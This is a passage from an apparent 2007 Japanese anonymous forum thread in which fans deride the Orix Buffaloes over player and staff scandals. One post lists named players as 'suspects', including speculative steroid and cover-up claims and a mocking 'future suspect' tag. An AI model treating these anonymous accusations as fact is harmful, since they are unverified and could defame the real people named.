球団も見舞金とかを独自に出すべきだよ。
三宮の「BSショップ」なら今は開いているね。078−391−0016

85 :代打名無し@実況は実況板で:2007/01/20(土) 15:58:49 ID:3S55g9INO
古田党はいいコテなのにな

86 :代打名無し@実況は実況板で:2007/01/20(土) 15:58:54 ID:4eGB+Ntc0
元オリックス野村容疑者
現オリックス前川容疑者
元社員婦女暴行

ここまで不祥事が続くと会社の体質としか思えないな。

87 :代打名無し@実況は実況板で:2007/01/20(土) 16:00:18 ID:/B9pVx+ZO
これじゃ客も来ないわな
檻だけ集客力が80年代なまま

88 :代打名無し@実況は実況板で:2007/01/20(土) 16:06:17 ID:lMOq6/WH0
元スカウト(イチローを発掘)自殺
元オリックス野村容疑者(麻薬所持)
元オリックス前川容疑者(ひき逃げ)
元オリックス中村紀洋容疑者(予定)
現オリックス清原容疑者(ステロイド疑惑、事実隠蔽工作)
元社員婦女暴行



どうしようもねえなこの糞球団。

32 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)